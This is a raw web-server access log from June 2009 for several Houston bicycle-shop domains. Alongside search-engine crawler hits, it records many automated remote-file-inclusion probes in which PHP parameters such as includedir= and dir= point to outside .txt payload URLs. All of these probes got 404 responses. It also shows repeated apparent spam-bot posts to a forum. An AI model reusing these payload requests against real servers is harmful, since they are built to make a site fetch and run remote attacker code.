122.153.212.195 - - [10/Jun/2009:02:13:16 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
122.153.212.195 - - [10/Jun/2009:02:13:17 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.249.36.194 - - [10/Jun/2009:02:13:21 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:13:27 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:13:44 -0700] "GET /translations/Italian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.249.36.194 - - [10/Jun/2009:02:13:45 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.188 - - [10/Jun/2009:02:16:39 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.106.134 - - [10/Jun/2009:02:23:42 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
70.85.165.10 - - [10/Jun/2009:02:28:57 -0700] "GET /logs/access.log////?_zb_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.85.165.10 - - [10/Jun/2009:02:29:00 -0700] "GET /logs/access.log////?_zb_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.85.165.10 - - [10/Jun/2009:02:38:14 -0700] "GET /logs/access.log////?_zb_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.30.142.240 - - [10/Jun/2009:02:42:55 -0700] "GET /?D=D HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
218.27.203.107 - - [10/Jun/2009:02:47:39 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://designmono.com/zboard_bbs/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.27.203.107 - - [10/Jun/2009:02:47:39 -0700] "GET /skin/zero_vote/error.php?dir=http://designmono.com/zboard_bbs/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.27.203.107 - - [10/Jun/2009:02:47:40 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://designmono.com/zboard_bbs/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
122.162.5.233 - - [10/Jun/2009:02:51:42 -0700] "GET / HTTP/1.1" 200 1764 "-" "-" "www.bicyclestoreshouston.com"
65.55.106.132 - - [10/Jun/2009:03:02:06 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
81.19.66.38 - - [10/Jun/2009:03:02:13 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:03:02:14 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:03:02:14 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:03:02:15 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:03:02:16 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:03:06:52 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:03:06:52 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
72.30.142.240 - - [10/Jun/2009:03:11:52 -0700] "GET /tmp/ HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:03:20:45 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:03:20:45 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:03:28:26 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:03:29:58 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:03:33:52 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:03:36:17 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:03:42:28 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 518 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
60.251.217.4 - - [10/Jun/2009:03:49:00 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
60.251.217.4 - - [10/Jun/2009:03:49:00 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
60.251.217.4 - - [10/Jun/2009:03:49:00 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
60.251.217.4 - - [10/Jun/2009:03:49:15 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
60.251.217.4 - - [10/Jun/2009:03:49:15 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
60.251.217.4 - - [10/Jun/2009:03:49:15 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
60.251.217.4 - - [10/Jun/2009:03:49:17 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:03:49:29 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:03:52:18 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:03:58:43 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
72.30.79.51 - - [10/Jun/2009:03:58:46 -0700] "GET /logs/?N=D HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
62.173.171.118 - - [10/Jun/2009:04:06:18 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://turgeonlaperle.com/modules/xoopsgallery/cache/idv6.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "houstonbikeshop.com"
62.173.171.118 - - [10/Jun/2009:04:06:18 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://turgeonlaperle.com/modules/xoopsgallery/cache/idv6.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "houstonbikeshop.com"
62.173.171.118 - - [10/Jun/2009:04:06:18 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://turgeonlaperle.com/modules/xoopsgallery/cache/idv6.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "houstonbikeshop.com"
72.30.142.250 - - [10/Jun/2009:04:14:16 -0700] "GET /logs/?D=A HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
72.30.142.240 - - [10/Jun/2009:04:14:43 -0700] "GET /?S=A HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
65.55.106.217 - - [10/Jun/2009:04:15:43 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
65.55.106.141 - - [10/Jun/2009:04:23:33 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
74.6.8.115 - - [10/Jun/2009:04:35:38 -0700] "GET /Product.html HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
81.19.66.38 - - [10/Jun/2009:04:43:28 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:04:43:29 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:04:43:30 -0700] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:04:43:30 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
190.54.28.195 - - [10/Jun/2009:04:49:52 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
190.54.28.195 - - [10/Jun/2009:04:49:52 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
190.54.28.195 - - [10/Jun/2009:04:55:26 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "bicyclestoreshouston.com"
190.54.28.195 - - [10/Jun/2009:04:55:26 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "bicyclestoreshouston.com"
190.54.28.195 - - [10/Jun/2009:04:55:26 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "bicyclestoreshouston.com"
190.54.28.195 - - [10/Jun/2009:04:55:33 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "bicyclestoreshouston.com"
190.54.28.195 - - [10/Jun/2009:04:55:56 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
190.54.28.195 - - [10/Jun/2009:04:55:56 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
69.237.82.158 - - [10/Jun/2009:05:09:33 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "bicyclestoreshouston.com"
69.237.82.158 - - [10/Jun/2009:05:09:33 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "bicyclestoreshouston.com"
69.237.82.158 - - [10/Jun/2009:05:09:34 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "bicyclestoreshouston.com"
69.237.82.158 - - [10/Jun/2009:05:11:03 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "bicyclestoreshouston.com"
69.237.82.158 - - [10/Jun/2009:05:11:03 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "houstonbikeshop.com"
69.237.82.158 - - [10/Jun/2009:05:15:15 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "houstonbikeshop.com"
69.237.82.158 - - [10/Jun/2009:05:15:15 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "houstonbikeshop.com"
69.237.82.158 - - [10/Jun/2009:05:15:15 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "houstonbikeshop.com"
69.237.82.158 - - [10/Jun/2009:05:15:16 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "houstonbikeshop.com"
72.30.142.240 - - [10/Jun/2009:05:18:01 -0700] "GET /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
114.80.93.71 - - [10/Jun/2009:05:22:10 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
72.30.142.250 - - [10/Jun/2009:05:55:21 -0700] "GET /tmp/?N=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
65.55.106.141 - - [10/Jun/2009:06:05:39 -0700] "GET /?D=A HTTP/1.1" 200 1764 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:06:25:49 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
97.65.232.42 - - [10/Jun/2009:06:33:07 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.bontrager.com/locator/search?id=1&proximity=25&unit=m&location=77043" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:06:38:59 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
72.30.78.238 - - [10/Jun/2009:06:47:15 -0700] "GET /logs/access_081110.log HTTP/1.0" 200 12041937 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:06:48:01 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
72.30.142.250 - - [10/Jun/2009:06:51:18 -0700] "GET /bullitinboard/viewtopic.php?p=13425 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
124.217.216.86 - - [10/Jun/2009:07:02:28 -0700] "GET /skin/zero_vote/error.php?dir=http://www.foxreality.com/editor/idus.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.826" "houstonbikeshop.com"
124.217.216.86 - - [10/Jun/2009:07:02:28 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "houstonbikeshop.com"
124.217.216.86 - - [10/Jun/2009:07:02:28 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "houstonbikeshop.com"
124.217.216.86 - - [10/Jun/2009:07:03:29 -0700] "GET /logs/access.log%20//skin/zero_vote/error.php?dir=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:07:05:53 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:07:08:38 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
62.30.249.129 - - [10/Jun/2009:07:10:18 -0700] "GET /translations/Italian.txt///errors.php?error=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.820" "houstonbikeshop.com"
62.30.249.129 - - [10/Jun/2009:07:10:20 -0700] "GET //errors.php?error=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.820" "houstonbikeshop.com"
62.30.249.129 - - [10/Jun/2009:07:10:21 -0700] "GET /translations///errors.php?error=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.820" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:07:18:44 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:07:21:39 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:07:27:56 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
72.30.142.240 - - [10/Jun/2009:07:30:25 -0700] "GET /?M=D HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:07:30:52 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
116.125.126.72 - - [10/Jun/2009:07:32:31 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
116.125.126.72 - - [10/Jun/2009:07:32:31 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
116.125.126.72 - - [10/Jun/2009:07:32:31 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
116.125.126.72 - - [10/Jun/2009:07:33:02 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:07:33:12 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
116.125.126.72 - - [10/Jun/2009:07:34:30 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
116.125.126.72 - - [10/Jun/2009:07:34:30 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
116.125.126.72 - - [10/Jun/2009:07:34:30 -0700] "GET /translations/Italian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
116.125.126.72 - - [10/Jun/2009:07:34:31 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
116.125.126.72 - - [10/Jun/2009:07:46:42 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
116.125.126.72 - - [10/Jun/2009:07:48:09 -0700] "GET /translations/English-US.txt//tools/send_reminders.php?noSet=0&includedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.41.205.41 - - [10/Jun/2009:07:48:44 -0700] "GET /skin/zero_vote/error.php?dir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.41.205.41 - - [10/Jun/2009:07:48:44 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.41.205.41 - - [10/Jun/2009:07:48:44 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:07:49:57 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
78.41.205.41 - - [10/Jun/2009:07:51:16 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.41.205.41 - - [10/Jun/2009:07:51:16 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.41.205.41 - - [10/Jun/2009:07:51:16 -0700] "GET /skin/zero_vote/error.php?dir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
74.52.2.130 - - [10/Jun/2009:07:51:38 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ingrus.net/sox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
78.41.205.41 - - [10/Jun/2009:07:53:09 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.41.205.41 - - [10/Jun/2009:07:53:09 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.41.205.41 - - [10/Jun/2009:07:53:09 -0700] "GET /skin/zero_vote/error.php?dir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
